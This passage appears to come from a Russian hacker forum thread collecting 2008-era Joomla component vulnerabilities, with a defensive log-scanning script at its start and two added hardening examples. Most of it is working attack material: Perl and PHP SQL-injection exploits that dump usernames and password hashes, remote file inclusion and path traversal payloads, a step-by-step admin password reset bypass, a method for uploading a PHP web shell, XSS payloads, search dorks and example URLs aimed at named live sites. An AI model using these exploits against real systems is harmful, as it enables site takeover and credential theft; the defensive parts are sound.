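    '10.0.0.6 - - [13/Jun/2008:10:01:03 +0000] "GET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://example.invalid/shell? HTTP/1.1" 200 311',
    '10.0.0.7 - - [13/Jun/2008:10:01:04 +0000] "GET /index.php?option=com_xewebtv&Itemid=60&func=detail&id=11+and+(SUBSTRING((SELECT+password+FROM+jos_users+LIMIT+0,1),1,1))=CHAR(97) HTTP/1.1" 200 4410',
    '10.0.0.8 - - [13/Jun/2008:10:01:05 +0000] "GET /index.php?option=com_imagebrowser&folder=../../../../ HTTP/1.1" 200 2200',
    '10.0.0.9 - - [13/Jun/2008:10:01:06 +0000] "GET /index.php?option=com_content&task=view&id=12&Itemid=29 HTTP/1.1" 200 9800',
]

# Rule names are invented for this example. Each regex runs over the decoded,
# whitespace-normalised request URL, so one pattern covers the encoded,
# plus-padded and comment-padded variants seen in the thread.
RULES = {
    "sqli_union": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "sqli_users_table": re.compile(r"\b(jos|mos)_users\b", re.I),
    "sqli_blind_probe": re.compile(r"\b(and|or)\b.*\b(substring|ascii)\s*\(", re.I),
    "rfi_config_var": re.compile(r"mosConfig_(absolute_path|live_site)=https?://", re.I),
    "traversal": re.compile(r"(\.\./){2,}|\x00", re.I),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)


def normalise(url):
    """Undo the encodings used by the payloads above: decode twice
    (%2F%2A%2A%2F -> /**/, + -> space, %00 -> NUL), then turn the /**/
    comment padding into ordinary spaces."""
    decoded = unquote_plus(unquote_plus(url))
    return decoded.replace("/**/", " ")


def classify(url):
    """Return the sorted names of every rule that fires on one request URL."""
    text = normalise(url)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def scan(lines):
    """Parse access-log lines; return (ip, url, hits) for each flagged request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format; skip rather than guess
        hits = classify(m.group("url"))
        if hits:
            findings.append((m.group("ip"), m.group("url"), hits))
    return findings


if __name__ == "__main__":
    for ip, url, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits), url[:80])
```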
The matrix
23.07.2008, 22:08
Product: Joomla
Component: wap4joomla
found by ImpLex & Microsoft Sam
exploit
#!/usr/bin/perl -w
print
"\t\t
################################################################
############ This exploit created by ImpLex ICQ: 444-979 #######
############ from WHACK.RU #######
############ WHACK.RU #######
############ wapmain.php remote sql injection exploit #######
############ LETS GO!!!! #######
################################################################\n\n";
use LWP::UserAgent;
print "\nEnter your target and folder fith wapversion(http://site.ru/wap): ";
chomp(my $target=<STDIN>);
print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): ";
chomp(my $number=<STDIN>);
print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) ";
chomp(my $table1=<STDIN>);
print "\n[+] connecting to ... ".$target."";
$new = LWP::UserAgent->new() or die "fucking browser does not work\n";
$new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,username,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+".$table1."+limit+".$number.",1--";
$result = $new->request(HTTP::Request->new(GET=>$host));
$ans = $result->content;
if ($ans =~ /111222:::(.*?):::111222/){
print "\n[+] User;password : $1";
print "\n[+] password = md5(md5:salt) or md5";
print "\n[+] target has been hacked";
print "\n[+] If password-md5(md5:salt) => Then user - admin";
print "\n[+] If password-md5 => Then it usual user";
}
else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}
com_imagebrowser component
lets you browse directories on the server ;)
example:
index.php?option=com_imagebrowser&folder=../../../../
Joomla Component EZ Store Blind SQL Injection Exploit
#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # #\n";
print " # Dork: inurl:com_ezstore #\n";
print " # Usage: perl ezstore.pl host path <options> #\n";
print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid procuct id #\n";
print " # -c Category value of the following product id #\n";
print " ################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $pid = $ARGV[3];
my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");
print "[~] Exploiting...\n";
if($options{"c"})
{
$cid = $options{"c"};
}
if($options{"p"})
{
$pid = $options{"p"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $pid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"x"})
{
$ua->proxy('http', "http://".$options{"x"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-08-03]
Agora 1.0.4 Acropolis Rus
google-> inurl: option=com_agora
$task = trim( mosGetParam( $_REQUEST, 'task', "" ) );
if ($task)
{
require ($agora_path . "/$task.php");
}
else
{
require ($agora_path . "/index.php");
}
a null byte won't work because of trim; you can include admin scripts that have no check of their own, the only plus being that you bypass _VALID_MOS in those scripts,
it also comes in handy if there are other scripts on the victim, or if the server is misconfigured you can include the neighbours' scripts
a null byte won't work because of trim,
yeah, right - http://php.su/functions/?trim
../../../../../../../../etc/./passwd%00fucked_trim_bypass
Joomla 1.5.x Remote Admin Password Change
File : /components/com_user/controller.php
###################################################################################
Line : 379-399
function confirmreset()
{
    // Check for request forgeries
    JRequest::checkToken() or die( 'Invalid Token' );
    // Get the input
    $token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}
    // Get the model
    $model = &$this->getModel('Reset');
    // Verify the token
    if ($model->confirmReset($token) === false) < --- {2}
    {
        $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
        $this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
        return false;
    }
    $this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}
###################################################################################
File : /components/com_user/models/reset.php
Line: 111-130
function confirmReset($token)
{
    global $mainframe;
    $db = &JFactory::getDBO();
    $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}
    // Verify the token
    if (!($id = $db->loadResult()))
    {
        $this->setError(JText::_('INVALID_TOKEN'));
        return false;
    }
    // Push the token and user id into the session
    $mainframe->setUserState($this->_namespace.'token', $token);
    $mainframe->setUserState($this->_namespace.'id', $id);
    return true;
}
###################################################################################
{1} - Replace ' with empty char
{3} - If you enter ' in the token field, the query will look like: "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
Example :
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
# milw0rm.com [2008-08-12]
com_clanwar Version: 1.2
require ("../../configuration.php");
$id = $_REQUEST['id'];
MYSQL_CONNECT($mosConfig_host,$mosConfig_user,$mosConfig_password);
mysql_select_db($mosConfig_db);
$query = "select image_binary from jos_cwc_match_ss where id='$id'";
$result = MYSQL_QUERY($query);
$data = MYSQL_RESULT($result,0,"image_binary");
Header( "Content-type: image/jpeg");
echo $data;
magic_quotes_gpc off
http://joomla.ru/components/com_clanwar/getimage.php?id=1'+union+select+database()/*
==================================================================================================================
[o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability
Software : com_treeg version 1.0
Vendor : http://justjoomla.net/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
==================================================================================================================
[o] Vulnerable file
administrator/components/com_treeg/admin.treeg.php
include( "$mosConfig_live_site/components/com_treeg/about.html" );
[o] Exploit
http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]
==================================================================================================================
[o] Greetz
MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
VOP Crew [ Vrs-hCk OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke
==================================================================================================================
# milw0rm.com [2008-11-01]
Joomla com_contactinfo 1.0 (catid)SQL-injection Vulnerability
________________________
http://www.milw0rm.com/exploits/7093
Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability
###################################################################################################################
#Author: Ded MustD!e
###################################################################################################################
#Google Dork: com_thyme
###################################################################################################################
#Exploit: http://www.site.com/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
###################################################################################################################
#Example: http://www.orlandoprofessionals.org/index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
###################################################################################################################
<creationDate>10/10/2005</creationDate>
<author>eXtrovert software</author>
<copyright>eXtrovert software</copyright>
<authorEmail>thyme@extrosoft.com</authorEmail>
<authorUrl>www.extrosoft.com</authorUrl>
<version>1.0</version>
# milw0rm.com [2008-11-21]
(c) milw0rm.com
Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln
Joomla Component mydyngallery AUTHOR : Sina Yazdanmehr (R3d.W0rm)
Discovered by : Sina Yazdanmehr (R3d.W0rm)
Our Site : Http://IRCRASH.COM
IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
Download : http://mydyngallery.mon-cottenchy.fr
DORK : inurl:option=com_mydyngallery
#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*
Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
#!/usr/bin/perl -w
# -----------------------------------------------------------
# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
# by s3rg3770 with athos :)
# demo http://www.disneyrama.com
# -----------------------------------------------------------
# Note: In lulz we trust :O
# -----------------------------------------------------------
use strict;
use LWP::UserAgent;
use LWP::Simple;
my $host = shift;
my $myid = shift or &help;
my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
"union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
"from+jos_users+where+id=${myid}--";
my $http = new LWP::UserAgent(
agent => 'Mozilla/4.5 [en] (Win95; U)',
timeout => '5',
);
my $response = $http->get($host.$path);
if($response->content =~ /!_(.+?)!_/i)
{
print STDOUT "Hash MD5: $1\n";
print STDOUT "Password: ".search_md5($1)."\n";
exit;
}
else
{
print STDOUT "Exploit Failed!\n";
exit;
}
sub search_md5
{
my $hash = shift @_;
my $cont = undef;
$cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
if(length($hash) < 32 && !is_error($cont))
{
return $cont;
}
}
sub help
{
print STDOUT "Usage: perl $0 [host] [user ID]\n";
print STDOUT "by athos - staker[at]hotmail[dot]it\n";
exit;
}
(c) milw0rm.com [2008-12-03 - 2008-12-04]
Can the DB be dumped from the admin panel?
There is a decent way to do that... In a few steps:
Log into the admin panel --> install the Joomla Explorer component --> upload a shell through it (alternatively just view configuration.php with the admin's login and password) --> get access to the DB --> make a dump... :)
SQL-Inj в com_fireboard:
http://whiteguard-clan.ru/component/option,com_fireboard/func,fbprofile/task,showprf'[sql]/Itemid,5/userid,78/
+xss:
http://whiteguard-clan.ru/component/option,com_fireboard/func,fbprofile/task,showprf'%3Ch1%3Elol%3C/h1%3E/Itemid,5/userid,78/
Another way to upload a shell through the admin panel when there are no write permissions on /modules/. Requires PHP <= 5.2.6:
Generate an archive (I use the library from phpMyAdmin):
<?php
include "Z:\home\localhost\www\Tools\phpmyadmin\libraries\zip.lib.php";
$zipfile = new zipfile();
$zipfile -> addFile("<? system($"."_GET['cmd']) ?>", "../../images/shell.php");
$fp = fopen("file.zip","wb");
fputs($fp,$zipfile -> file());
fclose($fp);
?>
and upload it through Modules. Your shell will be at http://site/images/shell.php.
And you can upload not into images but onto a neighbour's host on the same server, if you have the corresponding permissions. ;)
Another leaky component.
You can download it from Joomla.ru. Wish there were more like it
wap4joomla <=1.5
An example of a buggy script... In fact almost every script in there is buggy...
<?php
/*******************************************************************\
* File Name wap/onews/more.php *
* Date 30-04-2006 *
* For WAP4Joomla! WAP Site Builder *
* Writen By Tony Skilton admin@media-finder.co.uk *
* Version 1.5 *
* Copyright (C) 2006 Media Finder http://www.media-finder.co.uk *
* Distributed under the terms of the GNU General Public License *
* Please do not remove any of the information above *
\*******************************************************************/
header("Content-Type: text/vnd.wap.wml");
echo"<?xml version=\"1.0\"?>"; ?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN"
"http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
<? include("../../config.php"); ?>
<?
$id=$_GET["id"];
DB_connect($dbn,$host,$user,$pass);
$result = mysql_query("SELECT * FROM ".$dbpre."content WHERE id=$id");
while ($row = mysql_fetch_object($result)) {
$title = $row->title;
$done = $row->fulltext;
?>
<card id="news1" title="<? echo $title ?>">
<do type="prev" label="Back"><prev/></do>
<p>
<?
$done=eregi_replace(" "," ",$done);
$done=eregi_replace("&","&",$done);
$done=eregi_replace("<BR>"," <br />",$done);
$done=eregi_replace("<br>","<br />",$done);
$done=eregi_replace("</p>","<br />",$done);
$done=eregi_replace("<strong>","<b>",$done);
$done=eregi_replace("</strong>","</b>",$done);
$done=eregi_replace("<B>","<b>",$done);
$done=eregi_replace("</B>","</b>",$done);
$done=eregi_replace("{mosimage}"," ",$done);
$title=eregi_replace("&","&",$title);
$atags = "<b><br />";
$done = strip_tags($done, $atags);
$hmmm = "$done<br/>";
if (strlen($done)>$trim){
$wellover=substr($done,$trim+$over,1);
while($wellover!="\n"){
$wellover=substr($done,$trim+$over,1);
$trim=$trim-1;
};
$trim++;
if (isset($over)){
if ($over>=$trim){
$tmp=$over-$trim;
?>
<a href="<? echo "more.php?id=$id&over=$tmp"?>">Back...</a>
<?
};
}else{
$over=0;
};
print substr($hmmm,$over,$trim);
$over=$over+$trim;
if (strlen($done)>$over){
?>
<a href="<?print "more.php?id=$id&over=$over"?>">...Read on</a>
<?
};
} else {
print $hmmm;
};
}
?>
</p></card> </wml>
the dangerous line
$id=$_GET["id"];
DB_connect($dbn,$host,$user,$pass);
$result = mysql_query("SELECT * FROM ".$dbpre."content WHERE id=$id");
while ($row = mysql_fetch_object($result)) {
$title = $row->title;
$done = $row->fulltext;
exploit
http://has-implex.narod.ru/wap4joomla.txt
http://site.ru/joomla/wap/onews/more.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
(С)ImpLex
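Added example, not code from wap4joomla, the thread or any of the advisories: the hardened form of the more.php lookup above, with the id validated as an integer and bound through a prepared statement. It runs stand-alone against an in-memory SQLite table; the jos_ prefix, the column set and the sample rows are constructed assumptions, and the same pattern covers the other numeric-id injections collected in this thread (com_dictionary's wordid, com_productbook's id and so on).

```php
<?php
// Added example (not wap4joomla code): hardened replacement for
//   $id=$_GET["id"]; mysql_query("SELECT * FROM ".$dbpre."content WHERE id=$id");
// The id is validated as a positive integer and then bound as a parameter, so it
// can never alter the statement. The demo runs on an in-memory SQLite database
// with a constructed jos_content table (prefix, columns and rows are assumptions).

/**
 * Return the id as an int if it is a well-formed positive integer, else null.
 * FILTER_VALIDATE_INT rejects "-1 union select ...", "1 and 1=1", "0x41" and
 * trailing junk outright, which is the whole class of payloads in this thread.
 */
function validate_content_id($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Fetch one row by id. $prefix comes from the server-side config, not the request,
 * so concatenating it is fine; the id goes through a bound parameter.
 */
function fetch_content(PDO $db, string $prefix, $raw_id): ?array
{
    $id = validate_content_id($raw_id);
    if ($id === null) {
        return null;                       // invalid id: treat as "not found"
    }
    $stmt = $db->prepare("SELECT id, title, fulltext FROM {$prefix}content WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Constructed stand-in for the Joomla tables the PoCs in this thread target. */
function demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE jos_content (id INTEGER PRIMARY KEY, title TEXT, fulltext TEXT)');
    $db->exec('CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    $db->exec("INSERT INTO jos_content VALUES (1, 'Welcome', 'First article body')");
    $db->exec("INSERT INTO jos_users VALUES (62, 'admin', 'constructed-hash-placeholder')");
    return $db;
}

$db = demo_db();
$inputs = [
    '1',                                                                    // legitimate
    '-1 union select 1,2,concat(username,0x3a,password) from jos_users--',  // PoC style
    '1 and 1=1',                                                            // boolean probe
    '007',   // leading zero: FILTER_VALIDATE_INT rejects it, MySQL would have cast it to 7
];
foreach ($inputs as $in) {
    $row = fetch_content($db, 'jos_', $in);
    printf("%-72s => %s\n", $in, $row === null ? 'rejected / not found' : 'row ' . $row['id']);
}
```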
Ded MustD!e
13.12.2008, 19:50
Joomla Component Bibliography Blind-SQL/pXSS
Vulnerable product: Joomla Component Bibliography
Version: <= 1.3
Dork: "inurl:com_bibliography"
1. Blind-SQL
The vulnerability is in the file bibliography.php.
Vulnerable code fragment:
$count_query = "SELECT id FROM ".$mosConfig_dbprefix."bibliography WHERE published = 1 AND catid=$catid";
$count_result = $database->setquery($count_query);
$count_result = $database->query();
$count = mysql_num_rows($count_result);
$gesamtseiten = floor($count / $gl_perpage);
From the code you can see that the $catid parameter is not wrapped in quotes and is not filtered anywhere before that - this gives us the opportunity to perform an SQL injection.
Also from the code you can see that the obtained value is divided by a number (the number of pages) and only then output - this is what makes the injection blind.
Exploit: true: /index.php?option=com_bibliography&func=display&letter=&Itemid=&catid=1+and+1=1/*
false: /index.php?option=com_bibliography&func=display&letter=&Itemid=&catid=1+and+1=2/*
Example: true: http://www.irtg.uni-kl.de/index.php?option=com_bibliography&func=display&letter=B&Itemid=53&catid=67+and+substring(version(),1,1)=4/*&page=1
false: http://www.irtg.uni-kl.de/index.php?option=com_bibliography&func=display&letter=B&Itemid=53&catid=67+and+substring(version(),1,1)=5/*&page=1
2. Passive (reflected) XSS
The vulnerability is in the file bibliography.php.
Vulnerable code fragment:
else{
if ($letter=='All') echo "<font size='4'><strong>"._BIBLIOGRAPHY_ALL."</strong></font>";
elseif ($letter=='Other') echo "<font size='4'><strong>"._BIBLIOGRAPHY_OTHER."</strong></font>";
elseif ($letter=='[nothing]') echo "";
else echo "<font size='4'><strong>".$letter."</strong></font>";
From the code you can see that the $letter parameter is not filtered.
We get a reflected XSS:
index.php?option=com_bibliography&func=display&Itemid=43&catid=25&letter=<script>alert(/grey/);</script>
P.S. Grey was here)))
Joomla Component Userlist SQL-INJ
Vulnerable product: Joomla Component Userlist
Version: 2.5 (does not work in earlier versions - different query)
Dork: "inurl:com_userlist"
SQL-INJ
Required condition: magic_quotes_gpc = Off
The vulnerability is in the file userlist.php.
Vulnerable code fragment:
if ($search != "") {
$query .= " WHERE (u.name LIKE '%$search%' OR u.username LIKE '%$search%')";
The $search parameter is not filtered but is wrapped in quotes, so we can't do without quotes here.
Exploitation:
In the user search field, enter the following:
1' and 1=2) and 1=2 union select 1,2,3,4,5,6-- 1
We get the login and password:
1' and 1=2) and 1=2 union select concat(username,char(58),password),2,3,4,5,6 from jos_users-- 1
Vulnerabilities in earlier versions:
Version 2.0 SQL-INJ /index.php?option=com_userlist&limitstart=0,0+union+select+1,2,3,4--+1
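Added example, not the component's code: a replacement for the $letter echo block quoted in the Bibliography post above. The set of valid values is closed (All, Other, [nothing], or a single letter), so the value is checked against that set first and whatever is finally printed is HTML-encoded; the same approach applies to the other reflected parameters listed in this thread (year, msg, entity, type, fontstyle). The _BIBLIOGRAPHY_ALL / _BIBLIOGRAPHY_OTHER language constants are assumed to exist as in the original; the demo defines stand-ins.

```php
<?php
// Added example, not bibliography.php code: whitelist-then-encode for the $letter
// heading. Language constants are stand-ins for the component's own definitions.
if (!defined('_BIBLIOGRAPHY_ALL'))   define('_BIBLIOGRAPHY_ALL', 'All');
if (!defined('_BIBLIOGRAPHY_OTHER')) define('_BIBLIOGRAPHY_OTHER', 'Other');

/**
 * Return the heading HTML for the letter filter, or an empty string for the
 * "[nothing]" case. Unknown values are treated like "[nothing]" instead of echoed.
 */
function letter_heading(string $letter): string
{
    $label = null;
    if ($letter === 'All') {
        $label = _BIBLIOGRAPHY_ALL;
    } elseif ($letter === 'Other') {
        $label = _BIBLIOGRAPHY_OTHER;
    } elseif (preg_match('/^[A-Za-z]$/', $letter)) {
        // exactly one ASCII letter: the only free-form value the filter supports
        $label = strtoupper($letter);
    }
    if ($label === null) {
        return '';            // "[nothing]" and anything unexpected print nothing
    }
    // Encode on output regardless: a language constant could still carry markup.
    $safe = htmlspecialchars($label, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<font size='4'><strong>{$safe}</strong></font>";
}

// Constructed inputs: the legitimate forms, the explicit "[nothing]" case, and the
// payload from the post above, which must not be reflected.
$cases = ['B', 'All', 'Other', '[nothing]', '<script>alert(/grey/);</script>'];
foreach ($cases as $c) {
    printf("%-35s -> %s\n", $c, letter_heading($c) === '' ? '(nothing printed)' : letter_heading($c));
}
```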
Ded MustD!e
14.12.2008, 23:04
Joomla Component Productbook Blind-SQL
Vulnerable product: Joomla Component Productbook
Version: 1.0.4
Dork: "inurl:com_productbook"
Blind SQL-INJ
The vulnerability is in the file productbook.php.
Vulnerable code fragment:
$database->setQuery("SELECT a.*, cc.name AS category "
. " \n FROM #__productbook AS a, #__productbook_catg AS cc "
. " \n WHERE a.catid=cc.cid AND a.id=$id "
. " \n AND cc.access<='$gid'");
Exploit:
true: /index.php?option=com_productbook&Itemid=97&func=detail&id=351+and+and+1=1
false: /index.php?option=com_productbook&Itemid=97&func=detail&id=351+and+and+1=2
Example:
true: http://www.jovani.com/index.php?option=com_productbook&func=detail&Itemid=7&id=10153+and+substring(version(),1,1)=5
false: http://www.jovani.com/index.php?option=com_productbook&func=detail&Itemid=7&id=10153+and+substring(version(),1,1)=4
Code:
/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Examples:
http://www.l2hell.ru/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
http://uasos.com/index.php?Itemid=1&limit=14&limitstart=10696&option=com_frontpage&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Vulnerable product: Joomla Component Extcalendar
Dork: "inurl:com_extcalendar"
http://[target]/[path]/components/com_extcalendar/cal_popup.php?extmode=view&extid=0'+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
Same bug, just in a new wrapper :)
Vulnerable product: Joomla Component JCalPro
Dork: "inurl:com_jcalpro"
http://[target]/[path]/components/com_jcalpro/cal_popup.php?extmode=view&extid=0'+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
PS I've been using it for almost 2 years
Joomla Component com_hbssearch(r_type) Blind SQL-injection
http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54 -->FALSE
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54 -->TRUE
# milw0rm.com [2008-12-21]
Joomla Component com_tophotelmodule(id) Blind SQL-injection
Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=4 -->FALSE
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5 -->TRUE
# milw0rm.com [2008-12-21]
Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
http://www.milw0rm.com/exploits/7568
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
http://www.milw0rm.com/exploits/7567
Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln
http://www.milw0rm.com/exploits/7572
Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln
http://www.milw0rm.com/exploits/7573
Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln
http://www.milw0rm.com/exploits/7574
Joomla Component 5starhotels (id) SQL Injection Exploit
http://www.milw0rm.com/exploits/7575
Joomla com_phocadocumentation (id) Remote SQL Injection Exploit
http://www.milw0rm.com/exploits/7670
Joomla com_na_newsdescription (newsid) SQL Injection Exploit
http://www.milw0rm.com/exploits/7669
Joomla Component simple_review 1.x SQL Injection Vulnerability
http://www.milw0rm.com/exploits/7667
Component ReMOSitory 341RE (com_remository)
XSS
/index.php?option=com_remository&Itemid=1&func=select_XSS&
Example:
http://studik.lviv.ua/index.php?option=com_remository&Itemid=44&func=select_<img src="" onerror=alert('xss') xxx&id=1&orderby=2&page=2
Engine: Joomla
Component: com_gigcal(gigcal_gigs_id)
Vulnerability: SQL-injection
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
Joomla
Component: Fantasytournament (com_fantasytournament)
Version: 2009.1.5
Vulnerability: SQL-injection
http://localhost/Path/index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
Author:"Adrian Gray"
Component: Camelcitydb2 (com_camelcitydb2)
Version: 2.2
Vulnerability: SQL-injection
http://localhost/Path/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
Author:"Noel Hunter"
Joomla
Component: com_Eventing 1.6.x
Vulnerability: SQL Injection Exploit
<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# Joomla com_Eventing Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# cyb3r-1st@hormail.com
# == Writing by Stack - thx m8 - ==
#
# usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
